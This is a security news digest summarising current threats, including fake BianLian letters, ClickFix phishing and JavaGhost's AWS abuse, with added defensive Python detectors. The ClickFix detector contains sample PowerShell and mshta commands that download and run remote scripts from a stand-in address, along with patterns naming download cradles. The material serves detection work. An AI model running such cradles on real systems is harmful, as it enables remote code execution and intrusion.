Steven Campbell@Arctic Wolf - 18m
The FBI has issued a warning regarding a new data extortion scam where criminals are impersonating the BianLian ransomware group. These fraudsters are sending physical letters through the United States Postal Service to corporate executives, claiming their networks have been breached. The letters demand Bitcoin payments in exchange for preventing the release of sensitive company data.
Analysis suggests these letters are fraudulent, and organizations, particularly within the US healthcare sector, are advised to report such incidents to the FBI. Security vendors, including Arctic Wolf and GuidePoint Security, have studied the letters and believe the campaign is a ruse by someone pretending to be BianLian. The letters mimic conventional ransom notes, demanding payments of between $250,000 and $350,000 within 10 days. This activity highlights the evolving tactics of cybercriminals, who are now using postal mail to target high-profile individuals and extort money under false pretenses. The FBI urges companies to implement internal protocols for verifying ransom demands, for example confirming with the security team whether any evidence of intrusion exists before anyone engages with the sender, and to remain vigilant against these deceptive practices. Distinguishing fake attacks from real ones matters more as cybercrime grows more complex. Recommended read:
References :
eff.org via@lobste.rs - 5h
The Electronic Frontier Foundation (EFF) has launched Rayhunter, a new free and open-source tool designed to detect cell-site simulators (CSS), also known as IMSI catchers or Stingrays. These devices masquerade as legitimate cell towers, tricking phones into connecting to them. Law enforcement and other entities use CSS to pinpoint the location of phones and log identifying information, sometimes intercepting communications.
Rayhunter operates using an affordable mobile hotspot, empowering individuals, regardless of their technical skills, to search for CSS around the world. The EFF hopes this tool will help uncover how these devices are being used, as there is a lack of solid, empirical evidence about the function and usage of CSS. Police departments are often resistant to releasing logs of their use, and the companies that manufacture them are unwilling to divulge details of how they work. Recommended read:
References :
Alex Lekander@CyberInsider - 7h
The U.S. Department of Justice has charged 12 Chinese nationals in connection with a long-running cyber espionage campaign. These individuals, allegedly linked to Chinese state security and hacking groups like APT27 and i-Soon, are accused of targeting victims worldwide since 2011. The Justice Department has initiated a crackdown on the Chinese hacking network referred to as Silk Typhoon and the charges include attacks targeting US infrastructure.
The hacking group Silk Typhoon, believed to be behind the US Treasury break-in, has been actively targeting IT companies and government agencies since late 2024. Using stolen API keys and cloud credentials, they infiltrated organizations, seeking data related to US government policies, legal processes, and law enforcement investigations. Recommended read:
References :
Kirsten Doyle@Information Security Buzz - 7h
Proofpoint researchers have uncovered a cyber espionage campaign targeting the aviation and satellite communications sectors in the United Arab Emirates (UAE). Attributed to the threat cluster UNK_CraftyCamel, the operation exploited trusted business relationships to reach critical infrastructure. Beginning in October 2024, the attackers used a compromised email account belonging to INDIC Electronics, an Indian electronics company, to send spear-phishing emails containing malicious URLs to fewer than five targeted organizations in the UAE.
The malicious URLs mimicked legitimate domains and led recipients to download a ZIP archive containing polyglot files, crafted to evade detection by exploiting format-specific parsing quirks. When the LNK file inside the archive was executed, it triggered a chain of events that installed a custom backdoor named "Sosano." Sosano, written in Go, connects to a command-and-control server and supports commands for directory traversal, payload download, shell command execution, and directory deletion. Researchers noted similarities between UNK_CraftyCamel's tactics and those of Iranian-aligned groups, but assess it as a distinct entity. Recommended read:
References :
Kirsten Doyle@Information Security Buzz - 7h
References: Information Security Buzz
Socket researchers have discovered a malicious campaign infiltrating the Go ecosystem using typosquatted packages. These packages are designed to install hidden loader malware targeting Linux and macOS systems. The threat actor has published at least seven packages that impersonate widely used Go libraries.
These malicious packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor. One of the packages appears to target financial-sector developers. The typosquatted packages can execute remote code, potentially stealing data or credentials. Recommended read:
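A go.mod typosquat check, added here as an illustration (it is not Socket's tooling): it parses the require entries of a go.mod file and flags module paths that are either near-misses of a trusted path or reuse a trusted module's name under a different publisher, which are the two patterns typosquatted packages rely on. The trusted-module list, the go.mod content, and the look-alike module names are all constructed for the example.

```python
"""Typosquat check for Go module dependencies (added example, not Socket's code)."""
import re
from difflib import SequenceMatcher

# Constructed allow-list of trusted module paths; in practice this comes from
# the organisation's approved-dependency inventory.
TRUSTED_MODULES = {
    "github.com/hashicorp/go-retryablehttp",
    "github.com/shirou/gopsutil",
    "github.com/gorilla/mux",
    "golang.org/x/crypto",
}

# Constructed go.mod content: one exact match, one near-miss (missing "t"),
# one unrelated module, and one name reused under a different owner.
SAMPLE_GO_MOD = """module example.com/app

go 1.22

require (
\tgithub.com/gorilla/mux v1.8.1
\tgithub.com/hashicorp/go-retryablehtp v0.7.5
\tgithub.com/someorg/unrelated v1.0.0
\tgithub.com/someone/gopsutil v3.24.5
)
"""

REQUIRE_ENTRY = re.compile(r"^(\S+)\s+v\d+\.\d+\.\d+\S*")


def parse_requires(go_mod_text):
    """Return module paths from single-line and block-form require directives."""
    modules = []
    in_block = False
    for raw in go_mod_text.splitlines():
        line = raw.split("//", 1)[0].strip()  # drop comments such as "// indirect"
        if line == "require (":
            in_block = True
            continue
        if in_block and line == ")":
            in_block = False
            continue
        if line.startswith("require "):
            line = line[len("require "):].strip()
        elif not in_block:
            continue
        m = REQUIRE_ENTRY.match(line)
        if m:
            modules.append(m.group(1))
    return modules


def check_module(path, trusted=TRUSTED_MODULES, threshold=0.9):
    """Return (reason, lookalike) when path resembles a trusted module, else None."""
    if path in trusted:
        return None
    name = path.rsplit("/", 1)[-1]
    best, best_ratio = None, 0.0
    for candidate in trusted:
        # Same repository name under another owner is the classic Go typosquat.
        if candidate.rsplit("/", 1)[-1] == name:
            return ("same name, different publisher", candidate)
        ratio = SequenceMatcher(None, path, candidate).ratio()
        if ratio > best_ratio:
            best, best_ratio = candidate, ratio
    if best_ratio >= threshold:
        return ("near-miss of trusted path", best)
    return None


def scan_go_mod(go_mod_text):
    """List (module, reason, lookalike) for every suspicious require entry."""
    findings = []
    for path in parse_requires(go_mod_text):
        result = check_module(path)
        if result:
            findings.append((path,) + result)
    return findings


if __name__ == "__main__":
    for module, reason, lookalike in scan_go_mod(SAMPLE_GO_MOD):
        print(f"{module}: {reason} ({lookalike})")
```

The similarity threshold is deliberately high so that only one- or two-character edits trip it; the same-name rule needs no threshold because a duplicate name under a different owner is always worth a human look.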
References :
securebulletin.com@Secure Bulletin - 22h
New research indicates a connection between the Black Basta and Cactus ransomware gangs, with both groups employing similar social engineering attacks and the BackConnect proxy malware to gain persistent access to corporate networks. Trend Micro researchers have highlighted how both ransomware groups utilize the BackConnect (BC) module to maintain control over infected hosts and exfiltrate sensitive data. The use of QBACKCONNECT suggests a close working relationship between Black Basta and the QakBot developers.
The BackConnect module, tracked as QBACKCONNECT because of its overlaps with the QakBot loader, grants attackers a wide range of remote control capabilities, allowing them to execute commands and steal sensitive data such as login credentials, financial information, and personal files. Researchers observed a CACTUS ransomware attack that mirrored Black Basta's methods in deploying BackConnect, but extended the operation to include lateral movement and data exfiltration. Recommended read:
References :
Aman Mishra@gbhackers.com - 22h
References: gbhackers.com, www.bleepingcomputer.com
Cybersecurity researchers have revealed a sophisticated campaign where hackers are exploiting Microsoft Teams and Quick Assist for remote access. The attacks have been attributed to ransomware groups such as Black Basta and Cactus, highlighting a growing trend of cybercriminals abusing legitimate tools to bypass security defenses and infiltrate corporate networks. The attackers use social engineering tactics, including email flooding, followed by direct contact via Microsoft Teams, impersonating IT support staff to trick victims into granting access through Microsoft’s Quick Assist tool.
Once inside, attackers deploy additional malware by abusing OneDriveStandaloneUpdater.exe, a legitimate Microsoft process. By sideloading malicious DLLs, they establish persistent control and use BackConnect malware for command-and-control communication. This campaign has impacted various regions and industries, with a significant number of incidents occurring in North America, particularly the United States, and Europe. Manufacturing, financial services, and real estate sectors have been particularly targeted, as these threat actors are actively working around conventional security measures. Recommended read:
References :
Pierluigi Paganini@Security Affairs - 1d
Google has released the March 2025 Android Security Bulletin, which addresses 44 vulnerabilities. Notably, the update includes patches for two zero-day flaws, CVE-2024-43093 and CVE-2024-50302, that are being exploited in the wild. CVE-2024-43093 is a high-severity privilege escalation flaw in the Framework component that could give an app unauthorized access to the "Android/data," "Android/obb," and "Android/sandbox" directories and their sub-directories. CVE-2024-50302 is a flaw in the Linux kernel's HID (USB human interface device) subsystem that can leak uninitialized kernel memory to a local attacker through specially crafted HID reports.
This security update arrives after reports surfaced that Serbian authorities used one of these zero-day vulnerabilities to unlock confiscated devices. Google acknowledged that both CVE-2024-43093 and CVE-2024-50302 have come under "limited, targeted exploitation." The company has released two security patch levels to allow Android partners flexibility in addressing vulnerabilities across devices more quickly. The security patch levels are 2025-03-01 and 2025-03-05. Recommended read:
References :
Business Wire@ai-techpark.com - 2d
References: ai-techpark.com, www.networkworld.com
SolarWinds has acquired Squadcast, an incident response startup, to enhance its observability platform. The move aims to provide customers with intelligent automation capabilities, leading to faster incident resolution and a significant reduction in mean time to resolution (MTTR). By integrating Squadcast's technology, SolarWinds seeks to streamline incident management, improve operational resilience, and empower IT professionals to effectively manage hybrid ecosystems amidst a growing influx of alerts.
SolarWinds plans to integrate Squadcast's intelligent incident response product into its observability platform to accelerate MTTR. Squadcast's platform offers on-call management, incident response, reliability workflows, and continuous learning capabilities. Squadcast reports that its users see a 68% reduction in average MTTR and save some 1,000 work hours and $500,000 in costs. Financial details of the acquisition were not disclosed. Recommended read:
References :
Pierluigi Paganini@Security Affairs - 2d
The Polish Space Agency (POLSA) has shut down its systems and disconnected from the internet following a major cyberattack detected over the weekend. The agency confirmed the unauthorized intrusion into its IT infrastructure, prompting an immediate response to secure sensitive data. Cybersecurity teams are actively working to restore operations, with the Polish Computer Security Incident Response Team (CSIRT NASK) and the Polish Military CSIRT (CSIRT MON) assisting POLSA in securing affected systems.
Poland's Minister of Digital Affairs, Krzysztof Gawkowski, stated that the systems under attack were secured and that intensive operational activities are underway to identify the perpetrators behind the cyberattack. While the exact nature of the breach remains undisclosed, sources suggest that POLSA’s internal email systems were compromised, forcing employees to communicate via phone. Amid escalating cyber threats, Poland is significantly ramping up its cybersecurity defenses, with suspicions pointing towards Russian involvement. Recommended read:
References :
@csoonline.com - 2d
Broadcom has issued emergency security patches for VMware ESXi, Workstation, and Fusion products, addressing three zero-day vulnerabilities actively exploited in the wild. These flaws can lead to virtual machine escape, allowing attackers to potentially gain control of the host systems. VMware products, including VMware vSphere, VMware Cloud Foundation, and VMware Telco Cloud Platform, are affected. Broadcom credited Microsoft's MSTIC security team with spotting and reporting the attacks.
Patches are now available, and users of affected VMware products are strongly advised to apply them immediately to mitigate the risk of exploitation. Details are in Broadcom's advisory (CVE-2025-22224: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390). Recommended read:
References :
@cyberalerts.io - 2d
References: Virus Bulletin, securityaffairs.com
A mass exploitation campaign has targeted internet service providers (ISPs) in China and the U.S. West Coast, resulting in the deployment of information stealers and cryptocurrency miners. The Splunk Threat Research Team identified over 4,000 ISP IPs targeted in these brute-force attacks, exploiting weak credentials to gain initial access. Attackers are leveraging this access to deploy payloads designed for data exfiltration and establishing persistence within compromised systems.
The attacks are minimally intrusive to avoid detection, relying primarily on scripting languages such as Python and PowerShell, with command-and-control (C2) communication over Telegram. After gaining access, the attackers use PowerShell to drop executables for network scanning, information theft, and XMRig cryptocurrency mining. The stealer captures screenshots and reads clipboard content, looking for cryptocurrency wallet addresses, and exfiltrates what it gathers to a Telegram bot. The attackers specifically targeted the CIDR ranges of ISP infrastructure providers, using masscan to identify open ports before brute-forcing credentials. Recommended read:
References :
@cyberalerts.io - 3d
A newly uncovered ClickFix phishing campaign tricks victims into executing malicious PowerShell commands that deploy the Havoc post-exploitation framework, giving attackers remote access to compromised devices. The attackers conceal the stages of their malware within SharePoint sites and use a modified version of the Havoc Demon agent together with the Microsoft Graph API, so that command-and-control (C2) traffic blends in with legitimate traffic to trusted Microsoft services.
The attack starts with a phishing email carrying an HTML attachment which, when opened, displays a fake error message. Using the ClickFix technique, the message instructs the user to copy a PowerShell command and paste it into a terminal or PowerShell window, triggering the next stage. That command downloads and executes a PowerShell script hosted on an attacker-controlled server. The script checks for sandboxed environments, downloads the Python interpreter if it is not present, and runs a Python script that acts as a shellcode loader for KaynLdr, which in turn launches the Havoc Demon agent on the infected host. Recommended read:
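A heuristic detector for the pasted command in a ClickFix lure, added here as an example and not taken from the reported campaign or from any vendor's detection content. It scores PowerShell command lines (as they would appear in script-block logging or a run-history entry) for the traits such lures combine: a hidden window, a download-and-execute cradle, an encoded command, a living-off-the-land binary, a remote URL, and a "verification" comment appended so the pasted text looks harmless. Encoded commands are decoded and rescanned, since the cradle often hides there. The command lines and the 203.0.113.0/24 address are constructed for the example.

```python
"""Heuristic ClickFix detector for PowerShell command lines (added example)."""
import base64
import binascii
import re

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|net\.webclient|curl)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "lolbin": re.compile(r"\b(?:mshta|rundll32|regsvr32|certutil)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "decoy_comment": re.compile(r"#[^\n]*(?:robot|verif|captcha)", re.I),
}


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = INDICATORS["encoded_command"].search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(text):
    """Set of indicator names present; hits inside a decoded -enc payload are
    prefixed with "decoded:" so the encoding itself still counts as a signal."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded:
        hits |= {f"decoded:{name}" for name, rx in INDICATORS.items() if rx.search(decoded)}
    return hits


def is_clickfix_like(text, min_hits=2):
    """Two or more independent indicators is the flag threshold used here."""
    return len(analyze(text)) >= min_hits


# Constructed sample command lines; the URL uses the reserved 203.0.113.0/24 range.
ENCODED_PAYLOAD = base64.b64encode(
    "iex (irm http://203.0.113.5/a.ps1)".encode("utf-16-le")).decode()
SAMPLE_COMMANDS = {
    "clickfix_lure": 'powershell -w hidden -c "iex (irm https://203.0.113.5/verify.ps1)" '
                     '# I am not a robot - Verification',
    "encoded_cradle": f"powershell -nop -ep bypass -enc {ENCODED_PAYLOAD}",
    "lolbin_fetch": "mshta https://203.0.113.5/x.hta",
    "admin_benign": "Get-ChildItem C:\\Users -Recurse | Measure-Object",
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        print(f"{label:15} flagged={is_clickfix_like(cmd)} {sorted(analyze(cmd))}")
```

The two-indicator threshold keeps ordinary administration (a single remote URL, a single hidden window) below the line while a lure, which needs a cradle and a URL at minimum, always crosses it.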
References :
@securityboulevard.com - 3d
Reports indicate that the US Cyber Command has been ordered to halt offensive cyber operations against Russia, leading to concerns about the nation's cybersecurity posture. This decision comes amid efforts by the Trump administration to potentially offer concessions to Moscow in hopes of ending the war in Ukraine. Such a shift would mark a significant departure from longstanding assessments that have identified Russia as a major cyber threat.
While some reports suggest that CISA has also changed its priorities, focusing more on China and less on Russia, CISA denies any changes to its mission. The agency maintains that it continues to defend against all cyber threats, including those originating from Russia. However, this situation has drawn criticism from security professionals, who fear that reducing focus on Russian cyber activities could make the country more vulnerable and alter key international alliances. Recommended read:
References :
Aman Mishra@gbhackers.com - 3d
A cyber threat group known as JavaGhost has been exploiting misconfigured Amazon Web Services (AWS) Identity and Access Management (IAM) permissions to conduct sophisticated phishing campaigns. Palo Alto Networks Unit 42 is tracking this group, known as TGR-UNK-0011, which overlaps with JavaGhost. Since 2022, JavaGhost pivoted from website defacement to cloud-based phishing attacks, targeting unsuspecting targets for financial gain.
The group uses leaked long-term AWS access keys for initial access, then abuses AWS services such as Simple Email Service (SES) and WorkMail to send phishing emails from the victim's own account, which bypasses the protections a recipient would apply to mail from an unknown sender. They create new SMTP credentials and IAM users, some for active attacks and others for long-term persistence, and leave the same calling card in each environment they compromise. JavaGhost also generates temporary credentials and uses evasion techniques to obscure its identity in CloudTrail logs, a tactic historically used by Scattered Spider. The attackers create IAM roles with trust policies that allow access from attacker-controlled AWS accounts, and attempt to enable all AWS regions, potentially to evade security controls that cover only the regions an organization actually uses. All of these actions leave events in CloudTrail, giving vigilant organizations an opportunity for detection and response. Recommended read:
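CloudTrail checks for the IAM abuse described above, added here as an example rather than Unit 42's own detection content. The code runs over a list of CloudTrail records (constructed for the example, with placeholder account ids) and flags three of the behaviours the write-up calls out: an IAM role whose trust policy admits a principal from another AWS account, a region being enabled, and a freshly created IAM user receiving an access key (the pattern behind new SMTP credentials, which are IAM access keys under the hood). The account ids, user and role names, and the actor ARN are all assumptions.

```python
"""CloudTrail checks for JavaGhost-style IAM abuse (added example, not Unit 42's code)."""
import json
import re
from urllib.parse import quote, unquote

OWN_ACCOUNT = "111111111111"                     # constructed victim account id
ACTOR = "arn:aws:iam::111111111111:user/deploy"  # constructed owner of the leaked key


def _trust_policy(account_id):
    """Build a trust policy and URL-encode it the way CloudTrail records it."""
    doc = {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": f"arn:aws:iam::{account_id}:root"},
        "Action": "sts:AssumeRole"}]}
    return quote(json.dumps(doc))


def _event(source, name, **params):
    return {"eventSource": source, "eventName": name,
            "userIdentity": {"arn": ACTOR}, "recipientAccountId": OWN_ACCOUNT,
            "requestParameters": params}


# Constructed records, in the order the actions would appear in the trail.
SAMPLE_EVENTS = [
    _event("iam.amazonaws.com", "CreateUser", userName="svc-mailer"),
    _event("iam.amazonaws.com", "CreateAccessKey", userName="svc-mailer"),
    _event("iam.amazonaws.com", "CreateRole", roleName="ops-audit",
           assumeRolePolicyDocument=_trust_policy(OWN_ACCOUNT)),     # trusts own account
    _event("iam.amazonaws.com", "CreateRole", roleName="support-role",
           assumeRolePolicyDocument=_trust_policy("222222222222")),  # attacker account
    _event("account.amazonaws.com", "EnableRegion", regionName="ap-east-1"),
]


def principal_accounts(policy_doc):
    """Account ids (or "*") named as AWS principals in a trust policy."""
    statements = policy_doc.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    ids = set()
    for statement in statements:
        principal = statement.get("Principal", {})
        aws = principal.get("AWS", []) if isinstance(principal, dict) else principal
        for entry in [aws] if isinstance(aws, str) else aws:
            if entry == "*":
                ids.add("*")
                continue
            m = re.search(r"\b(\d{12})\b", entry)  # bare id or arn:aws:iam::<id>:root
            if m:
                ids.add(m.group(1))
    return ids


def detect(events, own_account=OWN_ACCOUNT):
    """Return (finding, subject, detail) tuples for suspicious records."""
    findings = []
    created_users = {}
    for ev in events:
        source, name = ev.get("eventSource"), ev.get("eventName")
        params = ev.get("requestParameters") or {}
        actor = ev.get("userIdentity", {}).get("arn", "unknown")
        if source == "iam.amazonaws.com" and name in ("CreateRole", "UpdateAssumeRolePolicy"):
            key = "assumeRolePolicyDocument" if name == "CreateRole" else "policyDocument"
            doc = json.loads(unquote(params.get(key, "{}")))
            foreign = principal_accounts(doc) - {own_account}
            if foreign:
                findings.append(("cross-account trust", params.get("roleName"), sorted(foreign)))
        elif source == "account.amazonaws.com" and name == "EnableRegion":
            findings.append(("region enabled", params.get("regionName"), actor))
        elif source == "iam.amazonaws.com" and name == "CreateUser":
            created_users[params.get("userName")] = actor
        elif source == "iam.amazonaws.com" and name == "CreateAccessKey":
            user = params.get("userName")
            if user in created_users:
                findings.append(("new user keyed by same actor", user, created_users[user]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The trust-policy check is the one with the highest signal: a role that trusts a foreign account is persistence that survives key rotation, so the foreign account id should be compared against a list of known partner accounts before the alert is closed.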
References :
Pierluigi Paganini@Security Affairs - 3d
Ransomware gangs are actively exploiting a zero-day flaw in the BioNTdrv.sys driver of Paragon Partition Manager. Microsoft has issued a warning about this actively exploited vulnerability, noting that attackers are leveraging it in ransomware attacks. Security researchers have uncovered five distinct vulnerabilities within the driver, which could allow malicious actors to escalate their privileges to SYSTEM level or cause denial-of-service (DoS) attacks.
These vulnerabilities include arbitrary kernel memory mapping and write issues, a null pointer dereference, insecure kernel resource access, and an arbitrary memory move vulnerability. Attackers can exploit these weaknesses, particularly in BioNTdrv.sys versions 1.3.0 and 1.5.1, even on systems without Paragon Partition Manager installed, using the "Bring Your Own Vulnerable Driver" (BYOVD) technique. Paragon Software has released an updated driver, BioNTdrv.sys version 2.0.0, for its Hard Disk Manager family products starting from version 17.45.0, to address these critical flaws. Recommended read:
References :
Titiksha Srivastav@The420.in - 3d
Lee Enterprises, a major American media company with over 75 publications, has confirmed a ransomware attack that has disrupted operations across its network. The notorious Qilin ransomware gang has claimed responsibility for the February 3rd attack, alleging the theft of 350GB of sensitive data. This stolen data purportedly includes investor records, financial arrangements, payments to journalists and publishers, funding for tailored news stories, and even approaches to obtaining insider information. The cyberattack has resulted in widespread outages, significantly impacting the distribution of printed newspapers, subscription services, and internal business operations.
The attack has caused delays in the distribution of print publications and has partially limited online operations. Lee Enterprises anticipates a phased recovery over the next several weeks and has implemented temporary measures, including manual processing of transactions. The company has also launched a forensic investigation to determine the full extent of the breach. The Qilin ransomware group's actions have brought attention to the increasing threat facing media organizations and the importance of robust cybersecurity measures to protect sensitive information and maintain operational integrity. Recommended read:
References :
Fred Oh@NVIDIA Newsroom - 4d
References: NVIDIA Newsroom, TechPowerUp
NVIDIA's CUDA libraries are increasingly vital in modern cybersecurity, bolstering defenses against emerging cyber threats like malware, ransomware, and phishing. Traditional cybersecurity measures struggle to keep pace with these evolving threats, especially with the looming risk of quantum computers potentially decrypting today's data through "harvest now, decrypt later" strategies. NVIDIA's accelerated computing and high-speed networking technologies are transforming how organizations protect their data, systems, and operations, enhancing both security and operational efficiency.
CUDA libraries are crucial for accelerating AI-powered cybersecurity. NVIDIA GPUs are essential for training and deploying AI models, offering faster AI model training, enabling real-time inference for identifying vulnerabilities, and automating repetitive security tasks. For example, AI-driven intrusion detection systems, powered by NVIDIA GPUs, can analyze billions of events per second to detect anomalies that traditional systems might miss. This real-time threat detection and response capability minimizes downtime and allows businesses to respond proactively to potential cyberattacks. Recommended read:
References :
@Talkback Resources - 4d
Cybersecurity researchers have unveiled advanced obfuscation tactics employed by APT28, a Russian state-sponsored threat actor, in their HTA Trojan. The investigation focuses on espionage campaigns targeting Central Asia and Kazakhstan diplomatic relations, revealing intricate multi-layer obfuscation strategies designed to evade detection. The analysis highlights the use of Microsoft’s VBE technique within HTA files as a core component of APT28’s malware delivery mechanism. This encoding method, facilitated by the Windows Script Encoder, transforms VBScript and JavaScript files into obfuscated formats that remain executable while concealing their true functionality.
The investigation uncovered that the malware leverages Windows’ vbscript.dll to generate embedded strings dynamically during execution. By analyzing these strings and their interaction with memory addresses, researchers were able to reconstruct the original VBScript payload hidden within the HTA file. Using publicly available tools like “vbe-decoder.py,” they successfully deobfuscated the encoded scripts, exposing the final malicious payload designed for espionage activities. This discovery underscores the need for robust malware analysis capabilities and proactive threat intelligence sharing within the cybersecurity community. Recommended read:
References :